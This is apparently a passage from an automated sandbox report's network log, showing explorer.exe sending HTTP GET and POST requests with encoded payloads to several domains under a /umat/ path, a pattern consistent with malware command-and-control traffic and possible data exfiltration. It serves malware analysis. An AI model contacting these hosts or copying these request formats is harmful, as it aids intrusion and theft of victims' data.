                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ks_c_5601-1987"/><title>404 - .</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had
                                                                                                          Jun 3, 2022 08:16:59.184284925 CEST7705INData Raw: 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d
                                                                                                          Data Ascii: its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.449783162.213.255.23780C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:09.624197006 CEST9575OUTGET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.shopcycles3.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:09.869417906 CEST9576INHTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:09 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Content-Length: 281
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 63 79 63 6c 65 73 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.shopcycles3.com Port 80</address></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.449825198.44.241.2080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:49.230521917 CEST10620OUTGET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:49.438215017 CEST10666INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 1841
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba cf b7 ca c9 c8 c0 cf bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 35 39 39 3b 26 23 33 31 33 39 37 3b 26 23 32 39 30 38 37 3b 26 23 32 32 38 39 39 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 33 30 34 39 35 3b 26 23 32 33 34 35 34 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 35 37 34 36 3b 26 23 32 33 36 31 35 3b 26 23 31 31 39 3b 26 23 39 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 32 30 32 36 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 2c 26 23 32 30 30 33 37 3b 26 23 33 38 37 33 38 3b 26 23 33 33 36 30 39 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 35 39 39 3b 26 23 33 31 33 39 37 3b 26 23 32 39 30 38 37 3b 26 23 32 32 38 39 39 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 33 30 34 39 35 3b 26 23 32 33 34 35 34 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 35 37 34 36 3b 26 23 32 33 36 31 35 3b 26 23 31 31 39 3b 26 23 39 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 32 30 32 36 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 2c 26 23 32 30 30 33 37 3b 26 23 33 38 37 33 38 3b 26 23 33 33 36 30 39 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 35 39 39 3b 26 23 33 31 33 39 37 3b 26 23 32 39 30 38 37 3b 26 23 32 32 38 39 39 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 33 30 34 39 35 3b 26 23 32 33 34 35 34 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 35 37 34 36 3b 26 23 32 33 36 31 35 3b 26 23 31 31 39 3b 26 23 39 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 32 30 32 36 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37
                                                                                                          Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#22269;&#20135;&#31934;&#21697;&#20599;&#31397;&#29087;&#22899;&#31934;&#21697;&#35270;&#39057;,&#22899;&#21397;&#30495;&#23454;&#20599;&#25293;&#25746;&#23615;&#119;&#99;&#35270;&#39057;,&#26085;&#26412;&#20081;&#30721;&#20262;&#35270;&#39057;&#20813;&#36153;&#25773;&#25918;,&#20037;&#38738;&#33609;&#24433;&#38498;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;</title><meta name="keywords" content="&#22269;&#20135;&#31934;&#21697;&#20599;&#31397;&#29087;&#22899;&#31934;&#21697;&#35270;&#39057;,&#22899;&#21397;&#30495;&#23454;&#20599;&#25293;&#25746;&#23615;&#119;&#99;&#35270;&#39057;,&#26085;&#26412;&#20081;&#30721;&#20262;&#35270;&#39057;&#20813;&#36153;&#25773;&#25918;,&#20037;&#38738;&#33609;&#24433;&#38498;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;" /><meta name="description" content="&#22269;&#20135;&#31934;&#21697;&#20599;&#31397;&#29087;&#22899;&#31934;&#21697;&#35270;&#39057;,&#22899;&#21397;&#30495;&#23454;&#20599;&#25293;&#25746;&#23615;&#119;&#99;&#35270;&#39057;,&#26085;&#26412;&#20081;&#30721;&#20262;&#35270;&#39057
                                                                                                          Jun 3, 2022 08:17:49.438241005 CEST10667INData Raw: 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 2c 26 23 32 30 30 33 37 3b 26 23 33 38 37 33 38 3b 26 23 33 33 36 30 39 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 3b
                                                                                                          Data Ascii: ;&#20813;&#36153;&#25773;&#25918;,&#20037;&#38738;&#33609;&#24433;&#38498;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;,&#20037;&#20037;&#20037;&#20037;&#24433;&#38498;&#32654;&#22899;&#22269;&#20135;&#20027;&#25773;,&#22269;&#20135;&#37326


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.449835107.187.232.17380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:55.044303894 CEST11048OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.sarrafguler.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.sarrafguler.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 4b 6c 65 2d 34 67 59 63 32 6f 45 4f 37 68 30 68 7a 37 75 6c 74 71 36 4f 49 5a 7a 4b 65 59 72 57 62 79 50 37 70 66 48 4c 57 73 76 55 4b 48 6c 34 5a 42 38 69 7a 65 72 38 55 72 6a 74 34 78 48 43 6f 42 61 6b 28 74 57 67 45 57 55 57 65 58 7e 7a 47 76 68 59 53 51 72 75 33 51 6d 76 48 4d 59 6e 47 58 53 5f 4d 50 4c 36 31 79 5a 33 75 4d 4b 71 74 55 35 65 7a 55 59 33 74 6e 7e 73 42 38 48 33 6c 30 47 32 43 55 6b 39 57 74 42 41 32 5f 37 64 7e 36 38 61 43 54 36 79 4a 58 38 43 47 52 75 73 61 6c 56 5f 76 51 74 31 6d 76 41 31 44 42 67 53 63 6c 78 45 36 70 53 77 66 4d 48 6f 64 74 77 6c 48 32 4e 58 4f 48 32 51 4b 70 4a 59 7e 38 41 68 6b 34 75 73 54 45 58 50 48 4f 34 55 32 58 4c 53 5a 79 66 74 57 55 34 5f 75 4b 63 57 41 79 37 50 72 77 6b 57 53 68 72 31 28 68 72 4c 51 74 4f 43 77 6f 65 54 74 48 74 72 75 55 44 64 76 61 53 33 5a 53 76 59 33 76 78 4d 64 62 4f 72 4f 6a 6e 53 70 2d 35 78 78 4e 47 31 68 65 4e 67 32 68 4a 70 41 78 59 53 65 65 32 6a 65 56 35 68 54 53 54 49 49 45 53 38 34 72 64 68 33 4f 66 51 48 5a 77 77 70 62 47 72 4b 72 44 66 66 34 68 55 72 71 58 76 71 31 53 50 6a 30 5a 45 5a 4b 58 77 30 79 78 61 71 30 4c 45 77 53 31 61 77 6f 47 55 75 69 6e 30 51 32 75 4a 7e 38 74 5f 45 43 48 39 36 78 53 44 54 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=Kle-4gYc2oEO7h0hz7ultq6OIZzKeYrWbyP7pfHLWsvUKHl4ZB8izer8Urjt4xHCoBak(tWgEWUWeX~zGvhYSQru3QmvHMYnGXS_MPL61yZ3uMKqtU5ezUY3tn~sB8H3l0G2CUk9WtBA2_7d~68aCT6yJX8CGRusalV_vQt1mvA1DBgSclxE6pSwfMHodtwlH2NXOH2QKpJY~8Ahk4usTEXPHO4U2XLSZyftWU4_uKcWAy7PrwkWShr1(hrLQtOCwoeTtHtruUDdvaS3ZSvY3vxMdbOrOjnSp-5xxNG1heNg2hJpAxYSee2jeV5hTSTIIES84rdh3OfQHZwwpbGrKrDff4hUrqXvq1SPj0ZEZKXw0yxaq0LEwS1awoGUuin0Q2uJ~8t_ECH96xSDTg).


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.449836107.187.232.17380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:55.225189924 CEST11057OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.sarrafguler.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.sarrafguler.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 4b 6c 65 2d 34 68 6b 4b 79 59 70 4f 33 52 49 43 79 75 4b 78 69 37 4b 49 4b 6f 48 56 41 4a 33 4e 63 41 6e 76 74 65 32 37 56 73 48 4b 42 58 4a 47 54 69 39 6b 7a 65 62 46 63 35 58 54 70 42 62 42 6f 42 43 47 28 74 43 67 48 57 39 62 66 30 71 56 46 4d 5a 58 53 77 71 62 6c 67 6e 35 52 2d 73 61 47 58 57 42 4d 50 44 71 31 44 6c 33 28 65 43 71 76 54 56 72 39 55 59 31 6b 48 76 74 4f 63 44 41 6c 31 6a 6a 43 57 41 39 44 4e 4e 41 33 63 6a 61 70 70 55 5a 61 54 36 33 66 6e 39 65 63 68 7a 64 61 6c 41 71 76 56 56 31 6d 36 77 31 4d 79 6f 53 4a 69 6c 48 79 35 53 35 62 4d 48 6c 5a 74 73 30 48 31 70 4c 4f 47 43 41 4c 59 4e 59 76 63 41 67 67 72 4f 53 46 44 69 56 42 4e 6c 34 32 58 48 72 5a 44 44 31 57 56 6b 44 35 72 4d 74 4f 78 54 6c 72 79 49 6f 56 78 71 64 33 42 72 55 51 74 4f 69 77 6f 65 39 74 45 46 72 75 53 44 64 75 37 43 33 66 79 76 48 39 5f 78 4b 48 72 4f 38 46 44 72 76 70 36 73 6d 78 50 32 6c 67 74 35 67 32 79 52 70 42 53 41 64 47 75 32 6c 61 56 34 6e 41 43 54 48 49 45 54 5a 34 76 41 38 33 39 72 51 46 4b 6f 77 75 35 75 72 47 37 44 66 52 59 68 57 6b 4b 62 47 71 31 61 4c 6a 31 46 79 5a 64 50 77 74 41 35 61 72 52 6e 45 77 69 31 61 37 49 48 67 67 58 43 4d 64 56 44 6a 77 4f 5a 54 4b 6b 32 71 30 77 6a 32 54 72 34 42 31 66 32 67 48 48 4b 4d 38 72 76 73 54 6e 4c 52 75 64 65 59 74 6d 48 50 62 66 4f 6f 4c 66 68 44 4c 43 65 4a 53 46 72 57 61 78 51 43 32 70 4d 42 30 47 50 5a 6d 4a 61 45 50 61 70 6d 55 51 5a 51 63 5a 69 52 6b 35 74 57 58 4f 66 59 28 35 73 79 50 69 61 38 71 4a 69 47 59 4d 41 74 6f 70 4c 43 77 45 50 43 68 73 75 70 66 56 63 2d 5a 68 4e 36 78 31 4f 57 65 63 46 31 6b 73 57 57 38 4a 75 47 33 56 52 61 6d 44 73 36 32 62 58 30 68 78 28 4d 50 4b 36 77 6f 77 39 54 76 48 6e 44 65 33 70 77 46 4b 30 53 76 71 5a 42 66 7a 39 48 49 65 73 37 57 31 6e 39 38 75 70 70 47 53 6d 5f 50 71 57 71 76 6e 69 79 52 66 73 58 5a 49 73 37 70 63 76 30 74 35 76 34 77 77 6e 43 48 45 74 79 44 6f 39 41 7a 6d 39 75 73 48 72 35 56 56 32 7a 34 6c 52 69 76 44 73 2d 51 2d 73 6c 7a 52 61 53 62 71 69 48 28 76 28 66 38 74 6a 76 74 36 37 79 42 4f 65 39 75 37 4b 62 4b 4e 35 75 31 33 6b 72 55 31 44 5f 68 51 50 48 53 39 57 41 49 52 37 50 43 34 59 49 46 38 69 37 4f 6e 63 30 76 70 42 7a 4f 6f 57 61 71 43 67 57 6e 71 36 44 73 6a 65 75 4d 62 46 5a 61 49 79 73 44 47 39 69 4f 53 74 6d 74 42 4a 33 74 48 75 31 36 59 6b 33 59 45 4d 62 78 33 6e 39 30 4b 66 4f 69 58 6c 77 68 63 4d 79 75 65 6d 56 6f 78 69 74 6d 73 50 39 39 48 6c 57 6f 50 59 64 49 6e 57 74 79 33 65 5f 7a 5a 46 71 79 54 49 41 4d 71 5a 67 7e 6c 70 57 42 72 54 71 63 7a 51 63 32 68 46 71 4a 66 28 67 56 72 57 57 43 43 35 6d 4b 6a 78 53 31 30 6d 5f 33 35 41 34 76 6b 70 6e 34 53 32 6a 4d 54 44 44 6f 50 33 49 4b 4a 34 6f 66 72 6d 39 35 35 4f 77 74 6d 6c 75 79 37 69 43 46 56 42 38 57 72 4a 71 4e 56 4a 45 53 6f 68 35 56 74 76 6f 48 37 74 58 53 38 50 4e 44 6a 46 71 44 49 48 4e 38 69 64 46 50 65 39 65 64 69 44 44 4d 54 34 5a 43 4c 77 71 73 56 55 77 78 38 68 49 6d 64 44 71 32 32 70 6d 49 41 39 72 49 31 44 36 48 63 77 38 42 49 64 48 77 6d 39 36 4c 53 78 64 79 48 58 49 51 78 4a 31 56 59 6d 64 34 69 7e 33 7e 39 32 34 73 5a 45 52 59 78 70 72 31 44 7a 33 44 73 47 6d 79 32 30 6c 6b 6f 69 38 71 66 61 4f 28 6d 76 39 36 6e 34 34 53 2d 72 69 55 38 67 39 78 5f 4a 61 30 38 38 47 65 6a 61 44 55 6a 43 36 6d 37 66 69 6e 30 58 6f 47 54 55 35 66 57 30 6d 6d 47 41 79 33 46 7e 49 75 51 50 44 77 42 62 58 58 38 32 56 4e 6e 76 5f 5a 42 45 38 4b 31 51 42 48 5f 37 79 62 51 4d 70 53 38 53 53 76 53 4e 67 6c 68 44 42 4d 58 48 59 74 39 73 42 45 57 38 58 64 4a 69 6a 38 51 47 36 79 47 4c 79 77 5f 57 5a 53 36 46 31 62 4f 41 66 6c 57 78 42 65 5a 6e 74 4f 71 31 4a 4d 5a 73 73 66 39 6c 62 6f 56 68 45 76 58 7e 44 33 35 57 75 52 54 73 77 4a 69 6d 50 41 48 4a 69 4f 4e 6a 56 78 72 53 6c 7e 63 55 2d 45 42 46 6d 4c 4b 4e 41 68 35 36 33 69 61 75 65 4c 33 42 63 33 46 67 4a 46 74 76 48 5a 6b 51 56 39 54 56 6f 48 4f 76 48 72 4e 4f 54 47 79 63 30 31 48 50 74 52 57 56 68 59 76 42 36 63 52 4e 55 66 78 52 70 69 52 55 55 31 79 41 71 28 6f 4d 6a 34 4d 73 47 28 34 67 2d 7a 42 45 39 4a 48 63 36 63 6f 37 41 31 75 43 64 51 43 76 78 7a 43 30 62 5a 5a 64 65 4e 44
                                                                                                          Data Ascii: bT7tPLpx=Kle-4hkKyYpO3RICyuKxi7KIKoHVAJ3NcAnvte27VsHKBXJGTi9kzebFc5XTpBbBoBCG(tCgHW9bf0qVFMZXSwqblgn5R-saGXWBMPDq1Dl3(eCqvTVr9UY1kHvtOcDAl1jjCWA9DNNA3cjappUZaT63fn9echzdalAqvVV1m6w1MyoSJilHy5S5bMHlZts0H1pLOGCALYNYvcAggrOSFDiVBNl42XHrZDD1WVkD5rMtOxTlryIoVxqd3BrUQtOiwoe9tEFruSDdu7C3fyvH9_xKHrO8FDrvp6smxP2lgt5g2yRpBSAdGu2laV4nACTHIETZ4vA839rQFKowu5urG7DfRYhWkKbGq1aLj1FyZdPwtA5arRnEwi1a7IHggXCMdVDjwOZTKk2q0wj2Tr4B1f2gHHKM8rvsTnLRudeYtmHPbfOoLfhDLCeJSFrWaxQC2pMB0GPZmJaEPapmUQZQcZiRk5tWXOfY(5syPia8qJiGYMAtopLCwEPChsupfVc-ZhN6x1OWecF1ksWW8JuG3VRamDs62bX0hx(MPK6wow9TvHnDe3pwFK0SvqZBfz9HIes7W1n98uppGSm_PqWqvniyRfsXZIs7pcv0t5v4wwnCHEtyDo9Azm9usHr5VV2z4lRivDs-Q-slzRaSbqiH(v(f8tjvt67yBOe9u7KbKN5u13krU1D_hQPHS9WAIR7PC4YIF8i7Onc0vpBzOoWaqCgWnq6DsjeuMbFZaIysDG9iOStmtBJ3tHu16Yk3YEMbx3n90KfOiXlwhcMyuemVoxitmsP99HlWoPYdInWty3e_zZFqyTIAMqZg~lpWBrTqczQc2hFqJf(gVrWWCC5mKjxS10m_35A4vkpn4S2jMTDDoP3IKJ4ofrm955Owtmluy7iCFVB8WrJqNVJESoh5VtvoH7tXS8PNDjFqDIHN8idFPe9ediDDMT4ZCLwqsVUwx8hImdDq22pmIA9rI1D6Hcw8BIdHwm96LSxdyHXIQxJ1VYmd4i~3~924sZERYxpr1Dz3DsGmy20lkoi8qfaO(mv96n44S-riU8g9x_Ja088GejaDUjC6m7fin0XoGTU5fW0mmGAy3F~IuQPDwBbXX82VNnv_ZBE8K1QBH_7ybQMpS8SSvSNglhDBMXHYt9sBEW8XdJij8QG6yGLyw_WZS6F1bOAflWxBeZntOq1JMZssf9lboVhEvX~D35WuRTswJimPAHJiONjVxrSl~cU-EBFmLKNAh563iaueL3Bc3FgJFtvHZkQV9TVoHOvHrNOTGyc01HPtRWVhYvB6cRNUfxRpiRUU1yAq(oMj4MsG(4g-zBE9JHc6co7A1uCdQCvxzC0bZZdeNDD4wW(aKuL4ZohC~HT5wjAsk0QOi1aiCLLn5kUnFRgnSj0RPTpy7piJ84VK(p8wdp7_XQyYedcGmC1UgkPqZ_(2DRQePR7t9zuOvmP6JkjL1rSnTI2uqjbc8d3kRcHR53iOH1jEbQplZ7Xb0DM1NDN5NjjZn1s_a8EteAg51A6vYZjn4lwXeJIUM5LMlTBOAu5QKN4JDeZ3krMNIpedHocT4Xki(WzRJx64STKpvtqhvNtlu1lQnxbK9rbDUy6cdxaPKUNyaVFg~gpI(zmuAKMgGT(8uHhZxJRt0Q1Ux7F6Neh0wZsf2ud5e_XT00ZlR0~VAQ4QxHaXjFbORLZWFMP7MwHUHV(Zu7YZ1MyVuQdJFoEYjlR0xXeMQOK3b2HtceaBXlTJLTNZ841meuP7v7j2rx8D0xqa(APD8ZNya9W68KaSMxv7ve9LixVzPf7zSLBWQAu0p3Iy7vDXWeDui1y7Hxxhel1d~MlCUkxZxnbY~UDf(t2xdAtGLSEsjIySKUSSB58fKRR76KFrA9yppXt2C9MhkTywCUUuVz2cbag_XRZB8PIMvY03U-m12CgILdZ8DkrBWXHchB~oEWAhsKQT8iFJoyN0u0V4alIBMy4vOzYY99V_gL68fDtBBgC3tROrazzVX8zfIMEMWlXysLYawUc22VnjqrjLjtKLRNTqVeWTuO2U3-h9Moe8zzUfM3b3NUddpJjPZlmCmLLaPU4Xjd8CWkz_8_4NU9jB1T19b5zu0Xsi~_eF4cJeH7i2WHO4tRbzXxxkzny-jhy6xORwEADnJ9MIMEl6NPnN(SViysr527KuPoMtere22tWAkO(6hBUq69fMoZMSyqfai9jPH869NK7iHGvA326uWRLIo0DLAlgjZjJp88EU2V(Xj8ALd3SLlsGex4cUaP08YxXw398ntakmtSGLYSQhUfs2oh5cVKhEQF5vZfiK386ZBjIE6PaAgpgZl_vH(Kr99AlHD7KRjnpwydp6~1RwncmzIVo5DGyhpd4TKosYFxn0bTxWGTUl4B2_j6ihP079bgmrwzBq8c25AC(QIQFvynIpyzELSSNq(H2MfLnA~OtL3ZR38yGyOCirqVdjiXPMB3QG395ipi02pRHCcSfpUVZBHcUJOt9127tk(BduIpobFEYtYRbscBSY9y5sVQrY8xDpD9UNJ-ncuHEN5RRAXQPwpH5tpCxZPzAnQszVSZJaFXkVx8SVdDu7m8hF6LU5pH8ScxspGey8wYYqf7UWu9XOWQC2CElnbR89JpMtZ5oqbPBK1MuSSzX2RTQu3enjO9S81cR1K8RGPeQvH4mJVcA0tUDaePBSFp9IrS36pbWdQssCV6U9qpiuq_S12v4e~PlPEWP3HKrs7qMGD9UOwyFEv7kiW494T6UvM-mNnrwEv73zPvoxPV03R_WLLBiGgmbsN57FJeNRvBUwDq0f7Zwa2zJGZ3n3O7Mvrh5Xg6wpjbrdor55aoAXND0LfzUa8S8yx_Bizh4T(xav9WnS~uXxtyBDMena0LKS5LYHw3uLO0esqxVtT7jjhmC675s8NLXq73cYzmR6QVBppbQB817It6espEJRG9ysPUC0feF5WQqBK8bkqBFzw52Y~dH0x7HmBjeMIVoI0LgTQGdh51mv(C5sNpYZqjFjTYyZiqit8X3YguZc492blRiAkgzxCFJVM5wxBcSTIm(AaB36t8H7aI3Kk6D0lkgHJcI9uBaiI_bpxW19iXjSzpCyJymIQ_q0kotipFwVes0pXLEx~23n3-7mp74ZJt1Z1qRGGa~fwplwTvcxMe8R8DDPravSyXI1hobl2TbQoU74maY-H55HFsMHJRKdiePWu8MU2DdUBXgANSdvfIVXPCPh5_TUkXkt3pQmxrXWmzAUSzVEfK8VaCuBZxkLZwBK(WljbT7shDuxS7AzlkU7K4axJeCuAd(ygs0KTyiD6amj2y7iIdclIpVK3W5BZFX2wIZqkOCWA4Q6qGWVbaszauhi~_Oiv10RQSZNj_kt7-zD6OVnlWKPYgYhTPT3zJoazaynAI8guM~aEpU9(nknFe(m3N4wTyPXOmFCsszRgCaO0CqwS5tazBnFJ04HMHjaRBUrVYXL6Xc3uiWuH9aZkeXejlixiyvfC7py3G02fdy3aXuQqeUyznJfxHC0tNXRHfn3Vqqf572enxeCVW(WnMGV4H1J0q20MbrgG_IpjgMIDG~y4Y54CtIiBpXOFJg8pk48BRYtzk0EFUM8~KdU2VtA5OdONHCTBrq-gXOVCIsoNbixyYI5FAwYazlCnP1wIGW-e5kXWE~DaEt3oNRJjnop4GlTN45CI1LYOzsF5VXXwAUAjG~LfdR7hPy17hpnmL9lR6WKLUAz